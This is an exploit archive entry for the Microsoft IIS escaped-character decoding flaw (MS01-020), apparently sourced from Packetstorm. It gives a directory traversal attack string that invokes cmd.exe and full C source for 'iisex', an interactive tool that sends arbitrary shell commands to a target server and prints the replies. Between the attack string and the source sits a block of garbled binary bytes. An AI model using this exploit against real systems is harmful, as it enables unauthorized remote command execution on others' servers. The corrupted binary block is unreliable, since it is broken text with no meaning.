MS IIS/PWS Escaped Characters Decoding Command Execution

Against

IIS on Windows

IDs

Bugtraq: 2708
CVE: CAN-2001-0333
CERT-Advisory: CA-2001-26
Microsoft: MS01-020
CERT-Vuln: 111677

Category

URL decoding error

Effect

Remote access

Source

Packetstorm

Description

No description available

Attack string

GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0

� Jul 1 15:23:45 UTC 2004�����������������������������������i686��������������������������������������������������������������none)���������������������������������������������������������������������������������������������}�@âî@âî@���� �����������¤ï@¨ž@H@øw@���¨z@¨K@‚‰¹
¾@¼l@˜y@����Ðïÿ¿�@Œïÿ¿hp@���8{@��������������þÖ�@5ƒXq@¼l@��������¬ïÿ¿}�@âî@σ‚‰¹
 �����������¤ï@¨ž@H@øw@���¨z@T‚Žÿw¨ƒ¼l@¸p@����`ðÿ¿�@ðÿ¿hp@���Øz@����������ðÿ¿vÌ�@˜y@8{@ðÿ¿���������������ôû@v��Žÿwðÿ¿o@¨ƒäðÿ¿Dðÿ¿@Ê�@��ø@����`œ8ðÿ¿µ„dû@Dðÿ¿Xðÿ¿±‰ððÿ¿Ðû@0Ó

Attack program source

iisex.c

    /* iisex iis exploit  (<- nost's idea) v2
     * --------------------------------------
     * Okay.. the first piece of code was not really finished.
     * So, i apologize to everybody.. 
     *
     * by incubus <incubus@securax.org>
     *
     * grtz to: Bio, nos, zoa, reg and vor... (who else would stay up 
     * at night to exploit this?) to securax (#securax@efnet) - also 
     * to kim, glyc, s0ph, tessa, lamagra and steven.
     * thx to spydir :)
     */ 
     
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

int main(int argc, char **argv){
    char buffy[666]; /* well, what else? I dunno how long your commands are.. */
    char buf[500];
    char rcvbuf[8192];
    int i, sock, result;
    struct sockaddr_in  name;
    struct hostent      *hostinfo;
    if (argc < 2){
    printf ("try %s www.server.com\n", argv[0]);
    printf ("will let you play with cmd.exe of an IIS4/5 server.\n");
    printf ("by incubus <incubus@securax.org>\n\n");
    exit(0);
    }
    printf ("\niisex - iis 4 and 5 exploit\n---------------------------\n");
    printf ("act like a cmd.exe kiddie, type quit to quit.\n");
    for (;;)
        {
        printf ("\n[enter cmd> ");
        gets(buf);
        if (strstr(buf, "quit")) exit(0);
        i=0;
        while (buf[i] != '\0'){
            if(buf[i] == 32) buf[i] = 43;
            i++; 
            }
        hostinfo=gethostbyname(argv[1]);
        if (!hostinfo){
            herror("Oops"); exit(-1);
        }

        name.sin_family=AF_INET; name.sin_port=htons(8000);
        name.sin_addr=*(struct in_addr *)hostinfo->h_addr;
        sock=socket(AF_INET, SOCK_STREAM, 0);
        result=connect(sock, (struct sockaddr *)&name, sizeof(struct sockaddr_in));
        if (result != 0) { herror("Oops"); exit(-1); }
        if (sock < 0){
        herror("Oops"); exit(-1); }
        strcpy(buffy,"GET /scripts/..\%c0%af../winnt/system32/cmd.exe?/c+");
        strcat(buffy,buf);
        strcat(buffy, " HTTP/1.0\n\n");
        send(sock, buffy, sizeof(buffy), 0);
        recv(sock, rcvbuf, sizeof(rcvbuf), 0);
        printf ("%s", rcvbuf);
        close(sock);
        }
}